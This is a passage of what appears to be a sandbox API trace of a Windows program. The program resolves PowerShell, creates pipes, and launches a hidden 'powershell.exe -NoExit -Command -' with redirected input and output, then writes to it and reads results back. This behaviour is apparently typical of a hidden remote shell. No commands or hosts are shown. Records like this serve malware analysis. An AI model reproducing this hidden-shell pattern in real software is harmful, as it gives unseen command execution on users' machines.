hTemplateFile=0x0) returned 0xffffffffffffffff [0057.048] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.048] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.049] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.049] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.049] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.049] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.049] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.049] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.049] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.js" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.049] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.js" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.049] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.049] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.049] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.049] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.050] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.050] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.050] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.050] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.050] VirtualAlloc (lpAddress=0xc000100000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000100000 [0057.050] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1 [0057.054] GetProcAddress (hModule=0x77940000, lpProcName="CreatePipe") returned 0x77944a10 [0057.054] CreatePipe (in: hReadPipe=0xc0000cb9a0, hWritePipe=0xc0000cb9a8, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0xc0000cb9a0*=0xcc, hWritePipe=0xc0000cb9a8*=0xd0) returned 1 [0057.055] CreatePipe (in: hReadPipe=0xc0000cb9a8, hWritePipe=0xc0000cb9b0, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0xc0000cb9a8*=0xd4, hWritePipe=0xc0000cb9b0*=0xd8) returned 1 [0057.055] CreatePipe (in: hReadPipe=0xc0000cb9a8, hWritePipe=0xc0000cb9b0, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0xc0000cb9a8*=0xdc, hWritePipe=0xc0000cb9b0*=0xe0) returned 1 [0057.055] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xc0000de270, nSize=0x64 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0057.055] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb350 | out: lpFileInformation=0xc0000cb350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1 [0057.056] GetProcAddress (hModule=0x77940000, lpProcName="GetEnvironmentStringsW") returned 0x77956d00 [0057.056] GetEnvironmentStringsW () returned 0x8913f0* [0057.056] VirtualAlloc (lpAddress=0xc000102000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000102000 [0057.056] VirtualAlloc (lpAddress=0xc000104000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000104000 [0057.057] GetProcAddress (hModule=0x77940000, lpProcName="FreeEnvironmentStringsW") returned 0x77956d20 [0057.057] FreeEnvironmentStringsW (penv=0x8913f0) returned 1 [0057.057] GetProcAddress (hModule=0x77940000, lpProcName="GetCurrentProcess") returned 0x77955cf0 [0057.057] GetCurrentProcess () returned 0xffffffffffffffff [0057.057] GetProcAddress (hModule=0x77940000, lpProcName="DuplicateHandle") returned 0x77955d10 [0057.057] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xc0000a0980, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc0000a0980*=0xe4) returned 1 [0057.057] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xd8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xc0000a0988, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc0000a0988*=0xe8) returned 1 [0057.057] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xe0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xc0000a0990, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc0000a0990*=0xec) returned 1 [0057.057] VirtualAlloc (lpAddress=0xc000106000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000106000 [0057.058] VirtualAlloc (lpAddress=0xc00010a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00010a000 [0057.058] GetProcAddress (hModule=0x77940000, lpProcName="CreateProcessW") returned 0x77961bb0 [0057.058] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell.exe -NoExit -Command -", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0xc00010a000, lpCurrentDirectory=0x0, lpStartupInfo=0xc0000cb728*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe4, hStdOutput=0xe8, hStdError=0xec), lpProcessInformation=0xc0000cb638 | out: lpCommandLine="powershell.exe -NoExit -Command -", lpProcessInformation=0xc0000cb638*(hProcess=0xf4, hThread=0xf0, dwProcessId=0xa24, dwThreadId=0x5c4)) returned 1 [0057.316] SetEvent (hEvent=0x100) returned 1 [0057.316] GetProcAddress (hModule=0x77940000, lpProcName="CloseHandle") returned 0x77962f80 [0057.316] CloseHandle (hObject=0xf0) returned 1 [0057.316] CloseHandle (hObject=0xec) returned 1 [0057.316] CloseHandle (hObject=0xe8) returned 1 [0057.316] CloseHandle (hObject=0xe4) returned 1 [0057.316] CancelIoEx (hFile=0xcc, lpOverlapped=0x0) returned 0 [0057.317] CloseHandle (hObject=0xcc) returned 1 [0057.317] CancelIoEx (hFile=0xd8, lpOverlapped=0x0) returned 0 [0057.317] CloseHandle (hObject=0xd8) returned 1 [0057.317] CancelIoEx (hFile=0xe0, lpOverlapped=0x0) returned 0 [0057.317] CloseHandle (hObject=0xe0) returned 1 [0057.318] CreateIoCompletionPort (FileHandle=0xffffffffffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0xffffffff) returned 0xe0 [0057.318] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7feff550000 [0057.318] GetProcAddress (hModule=0x7feff550000, lpProcName="CryptAcquireContextW") returned 0x7feff55d98c [0057.318] CryptAcquireContextW (in: phProv=0xc0000a0128, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xc0000a0128*=0x891660) returned 1 [0057.969] SetEvent (hEvent=0x100) returned 1 [0057.969] GetProcAddress (hModule=0x7feff550000, lpProcName="CryptGenRandom") returned 0x7feff55dc60 [0057.969] CryptGenRandom (in: hProv=0x891660, dwLen=0xc, pbBuffer=0xc0000a26e0 | out: pbBuffer=0xc0000a26e0) returned 1 [0057.970] CryptGenRandom (in: hProv=0x891660, dwLen=0xc, pbBuffer=0xc0000a2700 | out: pbBuffer=0xc0000a2700) returned 1 [0057.970] VirtualAlloc (lpAddress=0xc00010c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00010c000 [0057.971] GetProcAddress (hModule=0x77940000, lpProcName="WriteFile") returned 0x779635a0 [0057.971] WriteFile (in: hFile=0xd0, lpBuffer=0xc0000d2500*, nNumberOfBytesToWrite=0x75, lpNumberOfBytesWritten=0xc0000cb9a4, lpOverlapped=0x0 | out: lpBuffer=0xc0000d2500*, lpNumberOfBytesWritten=0xc0000cb9a4*=0x75, lpOverlapped=0x0) returned 1 [0057.971] SetEvent (hEvent=0x90) returned 1 [0057.971] VirtualAlloc (lpAddress=0xc00010e000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00010e000 [0057.972] GetProcAddress (hModule=0x77940000, lpProcName="ReadFile") returned 0x77951500 [0057.972] ReadFile (in: hFile=0xdc, lpBuffer=0xc0000ba9c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000113ddc, lpOverlapped=0x0 | out: lpBuffer=0xc0000ba9c0*, lpNumberOfBytesRead=0xc000113ddc*=0x21, lpOverlapped=0x0) returned 1 [0090.608] SetEvent (hEvent=0x100) returned 1 [0090.609] ReadFile (in: hFile=0xdc, lpBuffer=0xc00000c180, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000113ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c180*, lpNumberOfBytesRead=0xc000113ddc*=0x2, lpOverlapped=0x0) returned 1 [0090.609] ReadFile (in: hFile=0xdc, lpBuffer=0xc00000c1c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000113ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c1c0*, lpNumberOfBytesRead=0xc000113ddc*=0x40, lpOverlapped=0x0) returned 1 [0090.663] SetEvent (hEvent=0x100) returned 1 [0090.663] ReadFile (in: hFile=0xdc, lpBuffer=0xc00000c240, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000113ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c240*, lpNumberOfBytesRead=0xc000113ddc*=0x5, lpOverlapped=0x0) returned 1 [0090.664] ReadFile (in: hFile=0xdc, lpBuffer=0xc00000c280, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000113ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c280*, lpNumberOfBytesRead=0xc000113ddc*=0x23, lpOverlapped=0x0) returned 1 [0093.713] SetEvent (hEvent=0x100) returned 1 [0093.713] VirtualAlloc (lpAddress=0xc00003c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00003c000 [0093.714] SetEvent (hEvent=0x90) returned 1 [0093.714] VirtualAlloc (lpAddress=0xc00003e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00003e000 [0093.715] WriteFile (in: hFile=0xd0, lpBuffer=0xc000010018*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0xc0000cba44, lpOverlapped=0x0 | out: lpBuffer=0xc000010018*, lpNumberOfBytesWritten=0xc0000cba44*=0x6, lpOverlapped=0x0) returned 1 [0093.729] CancelIoEx (hFile=0xd0, lpOverlapped=0x0) returned 0 [0093.730] CloseHandle (hObject=0xd0) returned 1 [0093.730] GetProcAddress (hModule=0x77940000, lpProcName="WaitForSingleObject") returned 0x77962b20 [0093.730] WaitForSingleObject (hHandle=0xf4, dwMilliseconds=0xffffffff) returned 0x0 [0094.127] SetEvent (hEvent=0x100) returned 1 [0094.127] VirtualAlloc (lpAddress=0xc000180000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000180000 [0094.128] GetProcAddress (hModule=0x77940000, lpProcName="GetExitCodeProcess") returned 0x779512b0 [0094.128] VirtualAlloc (lpAddress=0xc000182000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000182000 [0094.128] GetExitCodeProcess (in: hProcess=0xf4, lpExitCode=0xc0000cba74 | out: lpExitCode=0xc0000cba74*=0x0) returned 1 [0094.128] VirtualAlloc (lpAddress=0xc000184000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000184000 [0094.129] GetProcAddress (hModule=0x77940000, lpProcName="GetProcessTimes") returned 0x77944380 [0094.129] GetProcessTimes (in: hProcess=0xf4, lpCreationTime=0xc000180020, lpExitTime=0xc000180028, lpKernelTime=0xc000180030, lpUserTime=0xc000180038 | out: lpCreationTime=0xc000180020, lpExitTime=0xc000180028, lpKernelTime=0xc000180030, lpUserTime=0xc000180038) returned 1 [0094.129] CloseHandle (hObject=0xf4) returned 1 [0094.129] VirtualAlloc (lpAddress=0xc000186000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000186000 [0094.129] VirtualAlloc (lpAddress=0xc000188000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000188000 [0094.130] PostQueuedCompletionStatus (CompletionPort=0xe0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0094.130] PostQueuedCompletionStatus (CompletionPort=0xe0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0094.130] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0094.185] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0094.206] SetEvent (hEvent=0xec) returned 1 [0094.206] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c300, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c300*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0175.013] SetEvent (hEvent=0x100) returned 1 [0175.044] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c380, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c380*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0175.044] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c3c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c3c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0179.020] SetEvent (hEvent=0x100) returned 1 [0179.020] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c400, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c400*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0179.021] VirtualAlloc (lpAddress=0xc000040000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000040000 [0179.022] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c480, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c480*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0179.022] VirtualAlloc (lpAddress=0xc000042000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000042000 [0179.022] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c4c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c4c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0185.066] SetEvent (hEvent=0x100) returned 1 [0185.066] VirtualAlloc (lpAddress=0xc000044000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000044000 [0185.067] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c500, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c500*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0185.067] VirtualAlloc (lpAddress=0xc000046000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000046000 [0185.068] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c580, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c580*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0185.068] VirtualAlloc (lpAddress=0xc000048000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000048000 [0185.069] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c5c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c5c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0198.653] SetEvent (hEvent=0x100) returned 1 [0198.653] VirtualAlloc (lpAddress=0xc00004a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00004a000 [0198.653] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c600, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c600*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0198.654] VirtualAlloc (lpAddress=0xc00004c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00004c000 [0198.654] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c680, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c680*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0198.654] VirtualAlloc (lpAddress=0xc00004e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00004e000 [0198.655] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c6c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c6c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0200.273] SetEvent (hEvent=0x100) returned 1 [0200.273] VirtualAlloc (lpAddress=0xc000050000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000050000 [0200.273] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c700, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c700*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0200.273] VirtualAlloc (lpAddress=0xc000052000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000052000 [0200.274] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c780, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c780*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0200.274] VirtualAlloc (lpAddress=0xc000054000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000054000 [0200.274] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c7c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c7c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0202.109] SetEvent (hEvent=0x100) returned 1 [0202.109] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c800, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c800*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0202.109] VirtualAlloc (lpAddress=0xc000056000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000056000 [0202.110] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c880, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c880*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0202.110] VirtualAlloc (lpAddress=0xc000058000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000058000 [0202.117] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c8c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c8c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, 